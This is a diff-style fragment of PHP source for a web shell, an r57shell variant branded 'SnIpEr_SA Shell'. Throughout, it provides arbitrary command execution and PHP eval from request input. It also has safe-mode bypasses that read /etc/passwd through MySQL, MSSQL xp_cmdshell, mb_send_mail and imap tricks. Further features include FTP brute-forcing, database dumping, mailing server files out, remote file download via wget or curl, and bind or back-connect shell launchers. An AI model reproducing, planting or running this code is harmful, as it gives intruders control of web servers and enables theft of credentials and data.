+     @mysql_query("DROP TABLE IF EXISTS temp_SnIpEr_SA_table");
+     @mysql_query("CREATE TABLE `temp_SnIpEr_SA_table` ( `file` LONGBLOB NOT NULL )");
+     @mysql_query("LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table");
+     $r = @mysql_query("SELECT * FROM temp_SnIpEr_SA_table");
+     while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
+     @mysql_query("DROP TABLE IF EXISTS temp_SnIpEr_SA_table");
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mysql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to mysql server";
+  break;
+  case 'test4':
+  if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
+  $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
+  if($db)
+   {
+   if(@mssql_select_db($_POST['test4_md'],$db))
+    {
+     @mssql_query("drop table SnIpEr_SA_temp_table",$db);
+     @mssql_query("create table SnIpEr_SA_temp_table ( string VARCHAR (500) NULL)",$db);
+     @mssql_query("insert into SnIpEr_SA_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
+     $res = mssql_query("select * from SnIpEr_SA_temp_table",$db);
+     while(($row=@mssql_fetch_row($res)))
+      {
+      echo $row[0]."\r\n";
+      }
+    @mssql_query("drop table SnIpEr_SA_temp_table",$db);
+    }
+    else echo "[-] ERROR! Can't select database";
+   @mssql_close($db);
+   }
+  else echo "[-] ERROR! Can't connect to MSSQL server";
+  break;
+  case 'test5':
+  if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
+  $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
+  @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
+  $lines = file ('/tmp/mb_send_mail');
+  foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
+  break;
+  case 'test6':
+  $stream = @imap_open('/etc/passwd', "", "");
+  $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
+  for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
+  @imap_close($stream);
+  break;
+  case 'test7':
+  $stream = @imap_open($_POST['test7_file'], "", "");
+  $str = @imap_body($stream, 1);
+  echo $str;
+  @imap_close($stream);
+  break;
+  case 'test8':
+  if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
+  else echo $lang[$language.'_text119'];
+  break;
+ }
+}
+else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
+ $cmd_rep = ex($_POST['cmd']);
+ if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
+ else { echo @htmlspecialchars($cmd_rep)."\n"; }}
+if ($_POST['cmd']=="ftp_brute")
+ {
+ $suc = 0;
+ foreach($users as $user)
+  {
+  $connection = @ftp_connect($ftp_server,$ftp_port,10);
+  if(@ftp_login($connection,$user,$user)) { echo "[+] $user:$user - success\r\n"; $suc++; }
+  else if(isset($_POST['reverse'])) { if(@ftp_login($connection,$user,strrev($user))) { echo "[+] $user:".strrev($user)." - success\r\n"; $suc++; } }
+  @ftp_close($connection);
+  }
+ echo "\r\n-------------------------------------\r\n";
+ $count = count($users);
+ if(isset($_POST['reverse'])) { $count *= 2; }
+ echo $lang[$language.'_text97'].$count."\r\n";
+ echo $lang[$language.'_text98'].$suc."\r\n";
+ }
+if ($_POST['cmd']=="php_eval"){
+ $eval = @str_replace("<?","",$_POST['php_eval']);
+ $eval = @str_replace("?>","",$eval);
+ @eval($eval);}
+if ($_POST['cmd']=="mysql_dump")
+ {
+  if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); }
+  $sql = new my_sql();
+  $sql->db   = $_POST['db'];
+  $sql->host = $_POST['db_server'];
+  $sql->port = $_POST['db_port'];
+  $sql->user = $_POST['mysql_l'];
+  $sql->pass = $_POST['mysql_p'];
+  $sql->base = $_POST['mysql_db'];
+  if(!$sql->connect()) { echo "[-] ERROR! Can't connect to SQL server"; }
+  else if(!$sql->select_db()) { echo "[-] ERROR! Can't select database"; }
+  else if(!$sql->dump($_POST['mysql_tbl'])) { echo "[-] ERROR! Can't create dump"; }
+  else {
+   if(empty($_POST['dif'])) { foreach($sql->dump as $v) echo $v."\r\n"; }
+   else if($fp){ foreach($sql->dump as $v) @fputs($fp,$v."\r\n"); }
+   else { echo "[-] ERROR! Can't write in dump file"; }
+   }
+ }
+echo "</textarea></div>";
+echo "</b>";
+echo "</td></tr></table>";
+echo "<table width=100% cellpadding=0 cellspacing=0>";
+function div_title($title, $id)
+{
+  return '<a style="cursor: pointer;" onClick="change_divst(\''.$id.'\');">'.$title.'</a>';
+}
+function div($id)
+ {
+ if(isset($_COOKIE[$id]) && $_COOKIE[$id]==0) return '<div id="'.$id.'" style="display: none;">';
+ return '<div id="'.$id.'">';
+ }
+if(!$safe_mode){
+echo $fs.$table_up1.div_title($lang[$language.'_text2'],'id1').$table_up2.div('id1').$ts;
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,''));
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+else{
+echo $fs.$table_up1.div_title($lang[$language.'_text28'],'id2').$table_up2.div('id2').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text42'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text43'].$arrow."</b>",in('text','e_name',85,$dir).in('hidden','cmd',0,'edit_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt11']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text200'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text202'].$arrow."</b>",in('text','snn',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+echo $fs.$table_up1.div_title($lang[$language.'_text300'],'id3').$table_up2.div('id3').$ts;
+echo sr(15,"<b>".$lang[$language.'_text302'].$arrow."</b>",in('text','SnIpEr_SA',85,'/etc/passwd').in('hidden','cmd',0,'view_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt7']));
+echo $te.'</div>'.$table_end1.$fe;
+if($safe_mode){
+echo $fs.$table_up1.div_title($lang[$language.'_text57'],'id4').$table_up2.div('id4').$ts;
+echo sr(15,"<b>".$lang[$language.'_text58'].$arrow."</b>",in('text','mk_name',54,(!empty($_POST['mk_name'])?($_POST['mk_name']):("new_name"))).ws(4)."<select name=action><option value=create>".$lang[$language.'_text65']."</option><option value=delete>".$lang[$language.'_text66']."</option></select>".ws(3)."<select name=what><option value=file>".$lang[$language.'_text59']."</option><option value=dir>".$lang[$language.'_text60']."</option></select>".in('hidden','cmd',0,'mk').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt13']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode && $unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text67'],'id5').$table_up2.div('id5').$ts;
+echo sr(15,"<b>".$lang[$language.'_text68'].$arrow."</b>","<select name=what><option value=mod>CHMOD</option><option value=own>CHOWN</option><option value=grp>CHGRP</option></select>".ws(2)."<b>".$lang[$language.'_text69'].$arrow."</b>".ws(2).in('text','param1',40,(($_POST['param1'])?($_POST['param1']):("filename"))).ws(2)."<b>".$lang[$language.'_text70'].$arrow."</b>".ws(2).in('text','param2 title="'.$lang[$language.'_text71'].'"',26,(($_POST['param2'])?($_POST['param2']):("0777"))).in('hidden','cmd',0,'ch_').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode){
+$aliases2 = '';
+foreach ($aliases as $alias_name=>$alias_cmd)
+ {
+ $aliases2 .= "<option>$alias_name</option>";
+ }
+echo $fs.$table_up1.div_title($lang[$language.'_text7'],'id6').$table_up2.div('id6').$ts;
+echo sr(15,"<b>".ws(9).$lang[$language.'_text8'].$arrow.ws(4)."</b>","<select name=alias>".$aliases2."</select>".in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text54'],'id7').$table_up2.div('id7').$ts;
+echo sr(15,"<b>".$lang[$language.'_text52'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text53'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text55'].$arrow."</b>",in('checkbox','m id=m',0,'1').in('text','s_mask',82,'.txt;.php')."* ( .txt;.php;.htm )".in('hidden','cmd',0,'search_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+if(!$safe_mode && $unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text76'],'id8').$table_up2.div('id8').$ts;
+echo sr(15,"<b>".$lang[$language.'_text72'].$arrow."</b>",in('text','s_text',85,'text').ws(4).in('submit','submit',0,$lang[$language.'_butt12']));
+echo sr(15,"<b>".$lang[$language.'_text73'].$arrow."</b>",in('text','s_dir',85,$dir)." * ( /root;/home;/tmp )");
+echo sr(15,"<b>".$lang[$language.'_text74'].$arrow."</b>",in('text','s_mask',85,'*.[hc]').ws(1).$lang[$language.'_text75'].in('hidden','cmd',0,'find_text').in('hidden','dir',0,$dir));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text32'],'id9').$table_up2.$font;
+echo "<div align=center>".div('id9')."<textarea name=php_eval cols=100 rows=3>";
+echo (!empty($_POST['php_eval'])?($_POST['php_eval']):("/* delete script */\r\n//unlink(\"r57shell.php\");\r\n//readfile(\"/etc/passwd\");"));
+echo "</textarea>";
+echo in('hidden','dir',0,$dir).in('hidden','cmd',0,'php_eval');
+echo "<br>".ws(1).in('submit','submit',0,$lang[$language.'_butt1']);
+echo "</div></div></font>";
+echo $table_end1.$fe;
+if($safe_mode&&$curl_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text33'],'id10').$table_up2.div('id10').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test1_file',85,(!empty($_POST['test1_file'])?($_POST['test1_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test1').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text34'],'id11').$table_up2.div('id11').$ts;
+echo "<table class=table1 width=100% align=center>";
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test2_file',85,(!empty($_POST['test2_file'])?($_POST['test2_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test2').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mysql_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text35'],'id12').$table_up2.div('id12').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test3_md',15,(!empty($_POST['test3_md'])?($_POST['test3_md']):("mysql"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test3_ml',15,(!empty($_POST['test3_ml'])?($_POST['test3_ml']):("root"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test3_mp',15,(!empty($_POST['test3_mp'])?($_POST['test3_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test3_port',15,(!empty($_POST['test3_port'])?($_POST['test3_port']):("3306"))));
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test3_file',96,(!empty($_POST['test3_file'])?($_POST['test3_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test3').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$mssql_on)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text85'],'id13').$table_up2.div('id13').$ts;
+echo sr(15,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','test4_md',15,(!empty($_POST['test4_md'])?($_POST['test4_md']):("master"))).ws(4)."<b>".$lang[$language.'_text37'].$arrow."</b>".in('text','test4_ml',15,(!empty($_POST['test4_ml'])?($_POST['test4_ml']):("sa"))).ws(4)."<b>".$lang[$language.'_text38'].$arrow."</b>".in('text','test4_mp',15,(!empty($_POST['test4_mp'])?($_POST['test4_mp']):("password"))).ws(4)."<b>".$lang[$language.'_text14'].$arrow."</b>".in('text','test4_port',15,(!empty($_POST['test4_port'])?($_POST['test4_port']):("1433"))));
+echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','test4_file',96,(!empty($_POST['test4_file'])?($_POST['test4_file']):("dir"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test4').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&$unix&&function_exists('mb_send_mail')){
+echo $fs.$table_up1.div_title($lang[$language.'_text112'],'id22').$table_up2.div('id22').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test5_file',96,(!empty($_POST['test5_file'])?($_POST['test5_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test5').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_list')){
+echo $fs.$table_up1.div_title($lang[$language.'_text113'],'id23').$table_up2.div('id23').$ts;
+echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','test6_file',96,(!empty($_POST['test6_file'])?($_POST['test6_file']):($dir))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test6').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode&&function_exists('imap_body')){
+echo $fs.$table_up1.div_title($lang[$language.'_text114'],'id24').$table_up2.div('id24').$ts;
+echo sr(15,"<b>".$lang[$language.'_text30'].$arrow."</b>",in('text','test7_file',96,(!empty($_POST['test7_file'])?($_POST['test7_file']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test7').ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if($safe_mode)
+{
+echo $fs.$table_up1.div_title($lang[$language.'_text115'],'id25').$table_up2.div('id25').$ts;
+echo sr(15,"<b>".$lang[$language.'_text116'].$arrow."</b>",in('text','test8_file1',96,(!empty($_POST['test8_file1'])?($_POST['test8_file1']):("/etc/passwd"))).in('hidden','dir',0,$dir).in('hidden','cmd',0,'test8'));
+echo sr(15,"<b>".$lang[$language.'_text117'].$arrow."</b>",in('text','test8_file2',96,(!empty($_POST['test8_file2'])?($_POST['test8_file2']):($dir))).ws(4).in('submit','submit',0,$lang[$language.'_butt8']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@ini_get('file_uploads')){
+echo "<form name=upload method=POST ENCTYPE=multipart/form-data>";
+echo $table_up1.div_title($lang[$language.'_text5'],'id14').$table_up2.div('id14').$ts;
+echo sr(15,"<b>".$lang[$language.'_text6'].$arrow."</b>",in('file','userfile',85,''));
+echo sr(15,"<b>".$lang[$language.'_text21'].$arrow."</b>",in('checkbox','nf1 id=nf1',0,'1').in('text','new_name',82,'').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(!$safe_mode&&$unix){
+echo $fs.$table_up1.div_title($lang[$language.'_text15'],'id15').$table_up2.div('id15').$ts;
+echo sr(15,"<b>".$lang[$language.'_text16'].$arrow."</b>","<select size=\"1\" name=\"with\"><option value=\"wget\">wget</option><option value=\"fetch\">fetch</option><option value=\"lynx\">lynx</option><option value=\"links\">links</option><option value=\"curl\">curl</option><option value=\"GET\">GET</option></select>".in('hidden','dir',0,$dir).ws(2)."<b>".$lang[$language.'_text17'].$arrow."</b>".in('text','rem_file',78,'http://'));
+echo sr(15,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',105,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te.'</div>'.$table_end1.$fe;
+}
+echo $fs.$table_up1.div_title($lang[$language.'_text86'],'id16').$table_up2.div('id16').$ts;
+echo sr(15,"<b>".$lang[$language.'_text59'].$arrow."</b>",in('text','d_name',85,$dir).in('hidden','cmd',0,'download_file').in('hidden','dir',0,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt14']));
+$arh = $lang[$language.'_text92'];
+if(@function_exists('gzcompress')) { $arh .= in('radio','compress',0,'zip').' zip';   }
+if(@function_exists('gzencode'))   { $arh .= in('radio','compress',0,'gzip').' gzip'; }
+if(@function_exists('bzcompress')) { $arh .= in('radio','compress',0,'bzip').' bzip'; }
+echo sr(15,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo $te.'</div>'.$table_end1.$fe;
+if(@function_exists("ftp_connect")){
+echo $table_up1.div_title($lang[$language.'_text93'],'id17').$table_up2.div('id17').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text87']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_down'));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt14']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text100']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',45,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))));
+echo sr(25,"<b>".$lang[$language.'_text37'].$arrow."</b>",in('text','ftp_login',45,(!empty($_POST['ftp_login'])?($_POST['ftp_login']):("anonymous"))));
+echo sr(25,"<b>".$lang[$language.'_text38'].$arrow."</b>",in('text','ftp_password',45,(!empty($_POST['ftp_password'])?($_POST['ftp_password']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text89'].$arrow."</b>",in('text','ftp_file',45,(!empty($_POST['ftp_file'])?($_POST['ftp_file']):("/ftp-dir/file"))).in('hidden','cmd',0,'ftp_file_up'));
+echo sr(25,"<b>".$lang[$language.'_text90'].$arrow."</b>","<select name=ftp_mode><option>FTP_BINARY</option><option>FTP_ASCII</option></select>".in('hidden','dir',0,$dir));
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt2']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($unix && @function_exists("ftp_connect")){
+echo $fs.$table_up1.div_title($lang[$language.'_text94'],'id18').$table_up2.div('id18').$ts;
+echo sr(15,"<b>".$lang[$language.'_text88'].$arrow."</b>",in('text','ftp_server_port',85,(!empty($_POST['ftp_server_port'])?($_POST['ftp_server_port']):("127.0.0.1:21"))).in('hidden','cmd',0,'ftp_brute').ws(4).in('submit','submit',0,$lang[$language.'_butt1']));
+echo sr(15,"","<font face=tahoma size=-2>".$lang[$language.'_text99']." ( <a href=".$_SERVER['PHP_SELF']."?users>".$lang[$language.'_text95']."</a> )</font>");
+echo sr(15,"",in('checkbox','reverse id=reverse',0,'1').$lang[$language.'_text101']);
+echo $te.'</div>'.$table_end1.$fe;
+}
+if(@function_exists("mail")){
+echo $table_up1.div_title($lang[$language.'_text102'],'id19').$table_up2.div('id19').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text103']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("hello billy"))));
+echo sr(25,"<b>".$lang[$language.'_text108'].$arrow."</b>",'<textarea name=text cols=33 rows=2>'.(!empty($_POST['text'])?($_POST['text']):("mail text here")).'</textarea>');
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text104']."</div></b></font>";
+echo sr(25,"<b>".$lang[$language.'_text105'].$arrow."</b>",in('text','to',45,(!empty($_POST['to'])?($_POST['to']):("hacker@mail.com"))).in('hidden','cmd',0,'mail_file').in('hidden','dir',0,$dir));
+echo sr(25,"<b>".$lang[$language.'_text106'].$arrow."</b>",in('text','from',45,(!empty($_POST['from'])?($_POST['from']):("billy@microsoft.com"))));
+echo sr(25,"<b>".$lang[$language.'_text107'].$arrow."</b>",in('text','subj',45,(!empty($_POST['subj'])?($_POST['subj']):("file from r57shell"))));
+echo sr(25,"<b>".$lang[$language.'_text18'].$arrow."</b>",in('text','loc_file',45,$dir));
+echo sr(25,"<b>".$lang[$language.'_text91'].$arrow."</b>",in('radio','compress',0,'none',1).' '.$arh);
+echo sr(25,"",in('submit','submit',0,$lang[$language.'_butt15']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+if($mysql_on||$mssql_on||$pg_on||$ora_on)
+{
+$select = '<select name=db>';
+if($mysql_on) $select .= '<option>MySQL</option>';
+if($mssql_on) $select .= '<option>MSSQL</option>';
+if($pg_on)    $select .= '<option>PostgreSQL</option>';
+if($ora_on)   $select .= '<option>Oracle</option>';
+$select .= '</select>';
+echo $table_up1.div_title($lang[$language.'_text82'],'id20').$table_up2.div('id20').$ts."<tr>".$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text40']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text36'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))).' <b>.</b> '.in('text','mysql_tbl',15,(!empty($_POST['mysql_tbl'])?($_POST['mysql_tbl']):("user"))));
+echo sr(35,in('hidden','dir',0,$dir).in('hidden','cmd',0,'mysql_dump')."<b>".$lang[$language.'_text41'].$arrow."</b>",in('checkbox','dif id=dif',0,'1').in('text','dif_name',31,(!empty($_POST['dif_name'])?($_POST['dif_name']):("dump.sql"))));
+echo sr(35,"",in('submit','submit',0,$lang[$language.'_butt9']));
+echo $te."</td>".$fe.$fs."<td valign=top width=50%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text83']."</div></b></font>";
+echo sr(35,"<b>".$lang[$language.'_text80'].$arrow."</b>",$select);
+echo sr(35,"<b>".$lang[$language.'_text111'].$arrow."</b>",in('text','db_server',15,(!empty($_POST['db_server'])?($_POST['db_server']):("localhost"))).' <b>:</b> '.in('text','db_port',15,(!empty($_POST['db_port'])?($_POST['db_port']):("3306"))));
+echo sr(35,"<b>".$lang[$language.'_text37'].' : '.$lang[$language.'_text38'].$arrow."</b>",in('text','mysql_l',15,(!empty($_POST['mysql_l'])?($_POST['mysql_l']):("root"))).' <b>:</b> '.in('text','mysql_p',15,(!empty($_POST['mysql_p'])?($_POST['mysql_p']):("password"))));
+echo sr(35,"<b>".$lang[$language.'_text39'].$arrow."</b>",in('text','mysql_db',15,(!empty($_POST['mysql_db'])?($_POST['mysql_db']):("mysql"))));
+echo sr(35,"<b>".$lang[$language.'_text84'].$arrow."</b>".in('hidden','dir',0,$dir).in('hidden','cmd',0,'db_query'),"");
+echo $te."<div align=center id='n'><textarea cols=55 rows=1 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES; SELECT * FROM user; SELECT version(); select user();"))."</textarea><br>".in('submit','submit',0,$lang[$language.'_butt1'])."</div></td>".$fe."</tr></div></table>";
+}
+if(!$safe_mode&&$unix){
+echo $table_up1.div_title($lang[$language.'_text81'],'id21').$table_up2.div('id21').$ts."<tr>".$fs."<td valign=top width=34%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text9']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text10'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text11'].$arrow."</b>",in('text','bind_pass',15,'r57'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt3']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text12']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text13'].$arrow."</b>",in('text','ip',15,((getenv('REMOTE_ADDR')) ? (getenv('REMOTE_ADDR')) : ("127.0.0.1"))));
+echo sr(40,"<b>".$lang[$language.'_text14'].$arrow."</b>",in('text','port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text20'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">Perl</option><option value=\"C\">C</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt4']));
+echo $te."</td>".$fe.$fs."<td valign=top width=33%>".$ts;
+echo "<font face=tahoma size=-2><b><div align=center id='n'>".$lang[$language.'_text22']."</div></b></font>";
+echo sr(40,"<b>".$lang[$language.'_text23'].$arrow."</b>",in('text','local_port',15,'11457'));
+echo sr(40,"<b>".$lang[$language.'_text24'].$arrow."</b>",in('text','remote_host',15,'irc.dalnet.ru'));
+echo sr(40,"<b>".$lang[$language.'_text25'].$arrow."</b>",in('text','remote_port',15,'6667'));
+echo sr(40,"<b>".$lang[$language.'_text26'].$arrow."</b>","<select size=\"1\" name=\"use\"><option value=\"Perl\">datapipe.pl</option><option value=\"C\">datapipe.c</option></select>".in('hidden','dir',0,$dir));
+echo sr(40,"",in('submit','submit',0,$lang[$language.'_butt5']));
+echo $te."</td>".$fe."</tr></div></table>";
+}
+echo '</table>'.$table_up3."</div></div><div align=center id='n'><font face=tahoma size=-2><b>o---[ SnIpEr_SA Shell  | <a href=http://3asfh.net>http://3asfh.net</a> | <a SnIpEr.SA@hotmail.com>sniper.sa@hotmail.com</a> | ÊÚÑíÈ æÊØæíÑ ]---o</b></font></div></td></tr></table>".$f;
+
+
+$u1p=""; // File to Include... or use _GET _POST
+$tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
+
+
+
